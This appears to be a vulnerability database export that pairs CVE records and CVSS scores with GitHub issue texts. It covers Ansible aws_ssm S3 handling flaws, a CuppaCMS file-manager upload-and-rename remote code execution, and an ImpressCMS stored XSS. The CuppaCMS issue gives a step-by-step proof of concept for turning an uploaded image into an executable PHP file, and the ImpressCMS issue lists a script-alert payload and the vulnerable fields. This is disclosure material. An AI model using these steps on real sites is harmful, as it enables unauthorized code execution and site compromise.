"userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25636" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible-collections/community.aws/issues/221" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25636" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible-collections/community.aws/issues/221" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:2.10.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "9C88089F-2A0A-4D2E-915B-C58D7402821C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/ansible-collections/community.aws/issues/221
[ "Third Party Advisory" ]
github.com
[ "ansible-collections", "community.aws" ]
##### SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. It writes these files directly to the root of the bucket. If multiple ansible processes are running and sharing the same bucket at the same time, collisions could happen. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME aws_ssm connection plugin ##### ANSIBLE VERSION ansible 2.10.1rc2 config file = /etc/ansible/ansible.cfg configured module search path = ['/home/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/user/.local/lib/python3.7/site-packages/ansible executable location = /home/user/.local/bin/ansible python version = 3.7.3 (default, Jul 25 2020, 13:03:44) [GCC 8.3.0] ##### CONFIGURATION n/a ##### OS / ENVIRONMENT debian 10 ##### STEPS TO REPRODUCE 1. use the aws_ssm plugin 2. look at the s3 bucket it used 3. observe that the files are not namespaced by instance id ##### EXPECTED RESULTS The plugin should transfer files in namespaced keys (folders) to avoid collisions. ##### ACTUAL RESULTS Files are written to the root of the s3 bucket.
aws_ssm connection plugin should namespace its file transfers
https://api.github.com/repos/ansible-collections/community.aws/issues/221/comments
0
2020-09-04T15:15:07Z
2020-10-11T21:34:51Z
https://github.com/ansible-collections/community.aws/issues/221
693,282,141
221
1,456
CVE-2020-25635
2020-10-05T14:15:13.217
A flaw was found in Ansible Base when using the aws_ssm connection plugin as garbage collector is not happening after playbook run is completed. Files would remain in the bucket exposing the data. This issue affects directly data confidentiality.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 3.6, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25635" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible-collections/community.aws/issues/222" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25635" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible-collections/community.aws/issues/222" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:2.10.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "9C88089F-2A0A-4D2E-915B-C58D7402821C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "212" ]
212
https://github.com/ansible-collections/community.aws/issues/222
[ "Third Party Advisory" ]
github.com
[ "ansible-collections", "community.aws" ]
##### SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. These files remain in the bucket after the play has complete, they are never removed. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME aws_ssm connection plugin ##### ANSIBLE VERSION ansible 2.10.1rc2 config file = /etc/ansible/ansible.cfg configured module search path = ['/home/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/user/.local/lib/python3.7/site-packages/ansible executable location = /home/user/.local/bin/ansible python version = 3.7.3 (default, Jul 25 2020, 13:03:44) [GCC 8.3.0] ##### CONFIGURATION n/a ##### OS / ENVIRONMENT debian 10 ##### STEPS TO REPRODUCE 1. use the aws_ssm plugin 2. look at the s3 bucket it used 3. observe that the files are transferred are still there ##### EXPECTED RESULTS The plugin should garbage collect files after transferring them. ##### ACTUAL RESULTS Files written remain there forever.
aws_ssm connection plugin should garbage collect the s3 bucket after the file transfers
https://api.github.com/repos/ansible-collections/community.aws/issues/222/comments
1
2020-09-04T15:25:10Z
2020-10-02T18:37:38Z
https://github.com/ansible-collections/community.aws/issues/222
693,296,526
222
1,457
CVE-2020-26048
2020-10-05T15:15:12.170
The file manager option in CuppaCMS before 2019-11-12 allows an authenticated attacker to upload a malicious file within an image extension and through a custom request using the rename function provided by the file manager is able to modify the image extension into PHP resulting in remote arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*", "matchCriteriaId": "D8ED1BEA-DDC5-4FB0-BD5B-B8BED225773A", "versionEndExcluding": "2019-11-12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CuppaCMS/CuppaCMS/issues/7
[ "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Affected software: CuppaCMS Type of vulnerability: Remote code execution Discovered by: Yosri Debaibi ## Description: The file manager option allows admin users to upload images to the application, the rename function could be altered by the users, An authenticated attacker is able to upload a malicious file within an image extension (jpg,jpeg,png ..) and through a custom request using the rename function provided by the file manager is able to modify the image extension into php as a result executing php codes . ## Proof of concept: ## Step1: Login to the cuppa cms. ## Step2:URL:http://127.0.0.1/cuppa/administrator/ Go to the File manager. ![Screenshot from 2019-11-01 17-18-32](https://user-images.githubusercontent.com/36981576/68039210-f1650180-fccb-11e9-86b7-6ce5c37eabce.png) ## Step3: Upload our malicious php file with image extension in Upload_files. ![im](https://user-images.githubusercontent.com/36981576/68043637-03e43880-fcd6-11e9-8fdd-ecbf6258e9f6.png) Once it is uploaded the file is renamed with "evil_1572625596.jpg" which it is located in media/upload_files/evil_1572625596.jpg as shown in the figure below ![Screenshot from 2019-11-01 17-27-08](https://user-images.githubusercontent.com/36981576/68039710-00987f00-fccd-11e9-879c-0ec045b14773.png) ## Step4: We launched our proxy to intercept the request then we will rename our file to evil.php using rename button in the file manager. ![Screenshot from 2019-11-01 17-34-58](https://user-images.githubusercontent.com/36981576/68042536-6b4cb900-fcd3-11e9-8207-3d927cc3b372.png) ## Step5: We deleted the jpg extension from "to:/upload_files/evil.php.jpg" parameter to change our file name to evil.php and forward the request to the server. ![Screenshot from 2019-11-01 17-36-24](https://user-images.githubusercontent.com/36981576/68042512-5cfe9d00-fcd3-11e9-9bc4-0f233bd62ae3.png) ## Step6: We had successfully uploaded our evil.php in the server. ![Screenshot from 2019-11-01 17-38-05](https://user-images.githubusercontent.com/36981576/68040406-8e289e80-fcce-11e9-8518-bcb3f17931bb.png) we executed our payload by accessing the url below http://127.0.0.1/cuppa/administrator/media/upload_files/evil.php PHP code is executed. ![im2](https://user-images.githubusercontent.com/36981576/68043616-fa5ad080-fcd5-11e9-9f2b-9cabe3d6fb9c.png)
Authenticated Remote code Execution
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/7/comments
5
2019-11-01T17:33:20Z
2020-12-10T09:56:08Z
https://github.com/CuppaCMS/CuppaCMS/issues/7
516,250,138
7
1,458
CVE-2020-17551
2020-10-07T17:15:13.287
ImpressCMS 1.4.0 is affected by XSS in modules/system/admin.php which may result in arbitrary remote code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/ImpressCMS/impresscms/issues/659" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.impresscms.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/ImpressCMS/impresscms/issues/659" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.impresscms.org/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:impresscms:impresscms:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "92D3930A-EBB1-4375-802C-34E837CCF918", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ImpressCMS/impresscms/issues/659
[ "Exploit", "Vendor Advisory" ]
github.com
[ "ImpressCMS", "impresscms" ]
Payload = **<script>alert('AppleBois');</script>** Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4 Vulnerable TextBar : ID of the [adsense tag to display this ad] Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod Vulnerable TextBar : Name Reference https://medium.com/@tehwinsam/impresscms-1-4-0-3aaf1825e6d5
Stored XSS on ImpressCMS 1.4.0
https://api.github.com/repos/ImpressCMS/impresscms/issues/659/comments
11
2020-06-18T23:49:04Z
2020-07-07T11:04:40Z
https://github.com/ImpressCMS/impresscms/issues/659
641,612,977
659
1,459